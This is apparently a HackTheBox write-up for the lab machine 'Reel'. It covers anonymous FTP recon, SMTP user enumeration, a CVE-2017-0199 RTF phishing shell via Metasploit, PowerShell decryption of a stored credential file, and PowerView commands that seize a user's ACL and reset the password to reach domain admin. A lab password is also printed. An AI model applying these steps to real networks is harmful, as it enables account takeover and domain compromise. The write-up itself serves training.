HTB - Reel Writeup - 10.10.10.77

7 minute read

sizzle

HackTheBox - Reel - 10.10.10.77

Reel is a Hard rated Active Directory machine on hackthebox.eu.

Summary

Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter, and highlights a technique for gaining privileges in an Active Directory environment.

Recon and Scanning

Nmap Results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
┌─[[email protected]]─[10.10.14.14]─[~/htb/boxes/Reel]
└──╼ $nmap -sC -sV -oN nmap/reel-init 10.10.10.77
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 18:28 BST
Nmap scan report for 10.10.10.77
Host is up (0.025s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows*NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|* 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.80%I=7%D=7/20%Time=5F15D43D%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m11s, deviation: 34m37s, median: 46s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2020-07-20T18:31:58+01:00
| smb-security-mode:
| account*used: <blank>
| authentication_level: user
| challenge_response: supported
|* message*signing: required
| smb2-security-mode:
| 2.02:
|* Message signing enabled and required
| smb2-time:
| date: 2020-07-20T17:31:59
|\_ start_date: 2020-07-20T17:25:51

Based on the open ports I can deduce that this is a Windows Server 2008 R2 domain controller.

Anonymous FTP Recon

As the nmap scan indicated, the FTP server accepts anonymous logon, so I will try that first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌─[[email protected]]─[10.10.14.14]─[~/htb/boxes/Reel]
└──╼ $ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-29-18 12:19AM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get AppLocker.docx
local: AppLocker.docx remote: AppLocker.docx
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 9 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
2047 bytes received in 0.03 secs (76.5382 kB/s)
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
124 bytes received in 0.02 secs (5.5907 kB/s)
ftp> get "Windows Event Forwarding.docx"
local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 51 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
14581 bytes received in 0.05 secs (272.2143 kB/s)
ftp> exit
221 Goodbye.

We got three intresting files, AppLocker.docx, readme.txt and Windows Event Forwarding.docx

Documents

AppLocker.docx

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

readme.txt

please email me any rtf format procedures - I’ll review and convert.
new format / converted documents will be saved here.

Windows Event Forwarding.docx - ExifTool

exiftool

From the metadata we get the following email, [email protected] this prompts us to enumerate the smtp, to enumerate valid usernames.

SMTP Enumeration

To enumerate SMTP we will use telnet to attempt to RCPT TO: <[email protected]> and see if the email is valid.

valid-email

Bingo! we have a valid email, [email protected]

RTF Phishing

After much guessing and research there is a metasploit module that will create a malicious RTF file that could get us a meterpreter session if we phish a user and they open the file. To exploit CVE-2017-0199, we need to get the user to open a malicious RTF file, which will make an HTTP request for an HTA file. This HTA file will execute code to give us a shell.

Metasploit Module

We will use this Metasploit Module, exploit/windows/fileformat/office_word_hta and the sendEmail program to phish the [email protected] user and get a rev shell.

msf-1

Now we have a lister setup we can send an email with this command

mail-send

And a minute later, Bingo!

shell

Priv Esc to Tom

On Nico’s desktop there is a file called cred.xml which contains a PSCredential, we can use the Import-CliXml PowerShell Module tp get the user tom’s plaintext password.

1
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List \*

file-passwd

Credentials

We can now use the credentials, tom:1ts-mag1c!!! to login over ssh to the box.

Tom to Claire

tom-ssh

On Tom’s desktop there is a folder called AD Audit with a Bloodhound acls.csv file, which we can import into Bloodhound. Firstly, we need to get the file of the machine, for this I will use Tom’s credentials with FileZilla.

filezilla

BloodHound Data Analysis

Now we can import it into Bloodhound with the Upload Data button. Note, you will need Bloodhound V1 instead of V3 to open the data, V1 can be downloaded from GitHub here.

bloodhound-1

We can see that we have full control over Claire, Claire also has WriteDacl writes over the Backup_Admins group so we can add Claire to that group.

bloodhound-2

Changing Claire’s Password

As we have control over Claire, we can use PowerView.ps1 which is already on the box, to:

Become owner of claire’s ACL’s
Get the permissions on that ACL
Use those aquired permissions to change the password of claire
SSH as Claire

These are the commands we will use to change Claire’s Password:

. .\PowerView.ps1
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
$cred = ConvertTo-SecureString "password123!" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred

commands

SSH as Claire

Now that we have changed claires credentials to, claire:password123! we can login as claire over ssh.

claire-ssh

Claire to Domain Admin

Now that we have access to claire’s account we can add ourselves to the Backup_Admins group.

add-command

And as you can see we have access to the Administrators folder.

icacls

But no access to the root.txt, but we have access to a script called, BackupScript.ps1 which at the top has the admin’s password.

denied

da-password

Logging In as Administrator over SSH

root-login

User and Root Flags

We can also now get the root and user flags.

1
2
type \users\administrator\desktop\root.txt
type \users\nico\desktop\user.txt

flags

Pwned

pwned

Respect

If you enjoyed my write up or found it useful consider +repping my htb profile linked below:

Finn Lestrange